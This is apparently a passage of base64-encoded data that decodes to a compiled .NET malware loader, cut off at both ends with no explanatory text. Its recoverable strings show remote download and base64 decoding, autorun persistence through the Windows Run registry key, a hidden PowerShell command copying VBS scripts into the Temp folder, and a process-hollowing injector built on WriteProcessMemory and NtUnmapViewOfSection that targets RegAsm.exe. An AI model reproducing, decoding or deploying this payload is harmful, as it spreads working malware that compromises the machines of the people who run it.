cm93c2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAFN0YW5kYXJkTW9kdWxlQXR0cmlidXRlAEhpZGVNb2R1bGVOYW1lQXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAFRhcmdldEZyYW1ld29ya0F0dHJpYnV0ZQBEZWJ1Z2dlckhpZGRlbkF0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAE15R3JvdXBDb2xsZWN0aW9uQXR0cmlidXRlAEFzc2VtYmx5RGVzY3JpcHRpb25BdHRyaWJ1dGUAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBBc3NlbWJseVByb2R1Y3RBdHRyaWJ1dGUAQXNzZW1ibHlDb3B5cmlnaHRBdHRyaWJ1dGUAQXNzZW1ibHlDb21wYW55QXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAGdldF9WYWx1ZQBzZXRfVmFsdWUAR2V0T2JqZWN0VmFsdWUAU2V0VmFsdWUAU3lzdGVtLlJ1bnRpbWUuVmVyc2lvbmluZwBGcm9tQmFzZTY0U3RyaW5nAERvd25sb2FkU3RyaW5nAFRvU3RyaW5nAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5NeVNlcnZpY2VzLkludGVybmFsAFN5c3RlbS5Db21wb25lbnRNb2RlbABDbGFzc0xpYnJhcnkzLmRsbABTeXN0ZW0AcmVzb3VyY2VNYW4AU3lzdGVtLkNvbXBvbmVudE1vZGVsLkRlc2lnbgBBcHBEb21haW4AZ2V0X0N1cnJlbnREb21haW4AZ2V0X0FwcGxpY2F0aW9uAE15QXBwbGljYXRpb24AU3lzdGVtLkNvbmZpZ3VyYXRpb24AU3lzdGVtLkdsb2JhbGl6YXRpb24AU3lzdGVtLlJlZmxlY3Rpb24ARXhjZXB0aW9uAFJ1bgBNZXRob2RJbmZvAEN1bHR1cmVJbmZvAHNldF9TdGFydEluZm8AUHJvY2Vzc1N0YXJ0SW5mbwBtX0FwcE9iamVjdFByb3ZpZGVyAG1fVXNlck9iamVjdFByb3ZpZGVyAG1fQ29tcHV0ZXJPYmplY3RQcm92aWRlcgBtX015V2ViU2VydmljZXNPYmplY3RQcm92aWRlcgBnZXRfUmVzb3VyY2VNYW5hZ2VyAFN5c3RlbS5Db2RlRG9tLkNvbXBpbGVyAGdldF9Vc2VyAEN1cnJlbnRVc2VyAGdldF9Db21wdXRlcgBNeUNvbXB1dGVyAENsZWFyUHJvamVjdEVycm9yAFNldFByb2plY3RFcnJvcgBBY3RpdmF0b3IALmN0b3IALmNjdG9yAFN5c3RlbS5EaWFnbm9zdGljcwBNaWNyb3NvZnQuVmlzdWFsQmFzaWMuRGV2aWNlcwBnZXRfV2ViU2VydmljZXMATXlXZWJTZXJ2aWNlcwBNaWNyb3NvZnQuVmlzdWFsQmFzaWMuQXBwbGljYXRpb25TZXJ2aWNlcwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMATWljcm9zb2Z0LlZpc3VhbEJhc2ljLkNvbXBpbGVyU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBTeXN0ZW0uUmVzb3VyY2VzAENsYXNzTGlicmFyeTMuTXkuUmVzb3VyY2VzAENsYXNzTGlicmFyeTMuUmVzb3VyY2VzLnJlc291cmNlcwBEZWJ1Z2dpbmdNb2RlcwBTdHJpbmdzAGdldF9TZXR0aW5ncwBNeVNldHRpbmdzAFJlZmVyZW5jZUVxdWFscwBSdW50aW1lSGVscGVycwBQcm9jZXNzAHNldF9Bcmd1bWVudHMARXhpc3RzAENvbmNhdABHZXRPYmplY3QATXlQcm9qZWN0AFN5c3RlbS5OZXQAZ2V0X0RlZmF1bHQAV2ViQ2xpZW50AFN0YXJ0AENvbnZlcnQAbV9Db250ZXh0AENsYXNzTGlicmFyeTMuTXkAT3BlblN1YktleQBSZWdpc3RyeUtleQBnZXRfQXNzZW1ibHkAUmVnaXN0cnkATXlTZXR0aW5nc1Byb3BlcnR5AAAAAAAvQwBsAGEAcwBzAEwAaQBiAHIAYQByAHkAMwAuAFIAZQBzAG8AdQByAGMAZQBzAAAbQwBsAGEAcwBzAEwAaQBiAHIAYQByAHkAMQAAM0MAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwARABlAGIAdQBnAC4AdgBiAHMAAHNDADoAXABXAGkAbgBkAG8A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FR44lP7//xEVLAZzJwAACnorJBEEewoAAAQRBygSAAAGFv4BExYfCThu/v//ERYsBnMnAAAKehEHHymUEwgfCjhW/v//EQR7CQAABBEIHtYSCRoSASgVAAAGFv4BExcfCzg1/v//ERcsBnMnAAAKehEGEQn+ARMYHww4HP7//xEYLCQRBHsJAAAEEQkoFwAABhb+AxMZHw04/v3//xEZLAZzJwAACnoEEQUfUNYoKAAAChMKHw444P3//wQRBR9U1igoAAAKEwsfDzjM/f//EQR7CQAABBEGEQogADAAAB9AKBgAAAYTDR8QOKz9//8FLQcRDRb+ASsBFhMaHxE4mP3//xEaLCkXEwwfEjiK/f//EQR7CQAABBYRCiAAMAAAH0AoGAAABhMNHxM4a/3//xENFv4BExsfFDhd/f//ERssBnMnAAAKehEEewkAAAQRDQQRCxIBKBYAAAYW/gETHB8VODT9//8RHCwGcycAAAp6EQUg+AAAANYTDh8WOBn9//8EEQUc1igqAAAKEw8fFzgG/f//EQ8X2hMdHxg4+fz//xYTHh8ZOO/8//84uwAAAAQRDh8M1igoAAAKEx8fGjjW/P//BBEOHxDWKCgAAAoTIB8bOML8//8EEQ4fFNYoKAAAChMhHxw4rvz//xEgFv4DEyIfHTig/P//ESIsWREgF9oX1o0bAAABEyMfHjiI/P//BBEhESMWESOOaSgrAAAKHx84cvz//xEEewkAAAQRDREf1hEjESOOaRIBKBYAAAYW/gETJB8gOE38//8RJCwGcycAAAp6EQ4fKNYTDh8hODX8//8RHhfWEx4RHhEdPjz///8RDSgsAAAKExAfIjgW/P//EQR7CQAABBEIHtYREBoSASgWAAAGFv4BEyUfIzj1+///ESUsBnMnAAAKegQRBR8o1igoAAAKExEfJDjX+///EQwTJh8lOMz7//8RJiwEEQYTDREHHywRDRER1p4fJjiz+///KCkAAAoa/gETJx8nOKL7//8RJywmEQR7CgAABBEHKBMAAAYW/gETKB8oOIT7//8RKCwGcycAAAp6KyQRBHsKAAAEEQcoFAAABhb+ARMpHyk4Xvv//xEpLAZzJwAACnoRBHsKAAAEKBkAAAYV/gETKh8qODz7//8RKiwGcycAAAp63l0oLQAAChYrARZFBQAAAAIAAAAUAAAAHgAA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VW5tYXBWaWV3T2ZTZWN0aW9uX0FQSQBDcmVhdGVQcm9jZXNzX0FQSQBXb3c2NEdldFRocmVhZENvbnRleHRfQVBJAFdvdzY0U2V0VGhyZWFkQ29udGV4dF9BUEkAVmlydHVhbEFsbG9jRXhfQVBJAFJlYWRQcm9jZXNzTWVtb3J5X0FQSQBXcml0ZVByb2Nlc3NNZW1vcnlfQVBJAFNUQVJUVVBfSU5GT1JNQVRJT04AUFJPQ0VTU19JTkZPUk1BVElPTgBUAGR3WABkd1kARGlzcG9zZV9fSW5zdGFuY2VfXwBDcmVhdGVfX0luc3RhbmNlX18AU2l6ZV8AUHJvamVjdERhdGEAZGF0YQBtc2NvcmxpYgBNaWNyb3NvZnQuVmlzdWFsQmFzaWMAVGhyZWFkSWQAUHJvY2Vzc0lkAEdldFByb2Nlc3NCeUlkAGJ5dGVzUmVhZABSZXN1bWVUaHJlYWQAdGhyZWFkAFN5bmNocm9uaXplZABjbWQAQ3JlYXRlSW5zdGFuY2UAZ2V0X0dldEluc3RhbmNlAGRlZmF1bHRJbnN0YW5jZQBpbnN0YW5jZQBHZXRIYXNoQ29kZQBjb21wYXRpYmxlAFRocmVhZEhhbmRsZQBSdW50aW1lVHlwZUhhbmRsZQBHZXRUeXBlRnJvbUhhbmRsZQBQcm9jZXNzSGFuZGxlAGhhbmRsZQBUaXRsZQBhcHBsaWNhdGlvbk5hbWUAY29tbWFuZExpbmUAVmFsdWVUeXBlAEdldFR5cGUAdHlwZQBnZXRfQ3VsdHVyZQBzZXRfQ3VsdHVyZQByZXNvdXJjZUN1bHR1cmUAQXBwbGljYXRpb25CYXNlAEFwcGxpY2F0aW9uU2V0dGluZ3NCYXNlAEVkaXRvckJyb3dzYWJsZVN0YXRlAENvbXBpbGVyR2VuZXJhdGVkQXR0cmlidXRlAEd1aWRBdHRyaWJ1dGUASGVscEtleXdvcmRBdHRyaWJ1dGUAR2VuZXJhdGVkQ29kZUF0dHJpYnV0ZQBEZWJ1Z2dlck5vblVzZXJDb2RlQXR0cmlidXRlAERlYnVnZ2FibGVBdHRyaWJ1dGUARWRpdG9yQnJvd3NhYmxlQXR0cmlidXRlAENvbVZpc2libGVBdHRyaWJ1dGUAQXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBTdGFuZGFyZE1vZHVsZUF0dHJpYnV0ZQBIaWRlTW9kdWxlTmFtZUF0dHJpYnV0ZQBBc3NlbWJseVRyYWRlbWFya0F0dHJpYnV0ZQBUYXJnZXRGcmFtZXdvcmtBdHRyaWJ1dGUAZHdGaWxsQXR0cmlidXRlAERlYnVnZ2VySGlkZGVuQXR0cmlidXRlAEFzc2VtYmx5RmlsZVZlcnNpb25BdHRyaWJ1dGUAT2JmdXNjYXRpb25BdHRyaWJ1dGUATXlHcm91cENvbGxlY3Rpb25BdHRyaWJ1dGUAQXNzZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBZYW5vQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBTdXBwcmVzc1VubWFuYWdlZENvZGVTZWN1cml0eUF0dHJpYnV0ZQBCeXRlAGdldF9WYWx1ZQBzZXRfVmFsdWUAR2V0T2JqZWN0VmFsdWUAZHdYU2l6ZQBkd1lTaXplAGdldF9TaXplAGJ1ZmZlclNpemUAU2l6ZU9mAFN5c3RlbS5SdW50aW1lLlZlcnNpb25pbmcAVG9TdHJpbmcAcGF0aABsZW5ndGgATWFyc2hhbABNaWNyb3NvZnQuVmlzdWFsQmFzaWMuTXlTZXJ2aWNlcy5JbnRlcm5hbABTeXN0ZW0uQ29tcG9uZW50TW9kZWwAQ2xhc3NMaWJyYXJ5MS5kbGwAa2VybmVsMzIuZGxsAG50ZGxsLmRsbABLaWxsAFN5c3RlbQByZXNvdXJjZU1hbgBCb29sZWFuAGJ5dGVzV3JpdHRlbgBTeXN0ZW0uQ29tcG9uZW50TW9kZWwuRGVzaWduAFZlcnNpb24AZ2V0X0FwcGxpY2F0aW9uAE15QXBwbGljYXRpb24AcHJvY2Vzc0luZm9ybWF0aW9uAFN5c3RlbS5Db25maWd1cmF0aW9uAFN5c3RlbS5HbG9iYWxpemF0aW9uAE50VW5tYXBWaWV3T2ZTZWN0aW9uAFN5c3RlbS5SZWZsZWN0aW9uAEV4Y2VwdGlvbgBIYW5kbGVSdW4AQ3VsdHVyZUluZm8Ac3RhcnR1cEluZm8AWmVybwBEZXNrdG9wAG1fQXBwT2JqZWN0UHJvdmlkZXIAbV9Vc2VyT2JqZWN0UHJvdmlkZXIAbV9Db21wdXRlck9iamVjdFByb3ZpZGVyAG1fTXlXZWJTZXJ2aWNlc09iamVjdFByb3ZpZGVyAEJ1ZmZlcgBidWZmZXIAZ2V0X1Jlc291cmNlTWFuYWdlcgBTeXN0ZW0uQ29kZURvbS5Db21waWxlcgB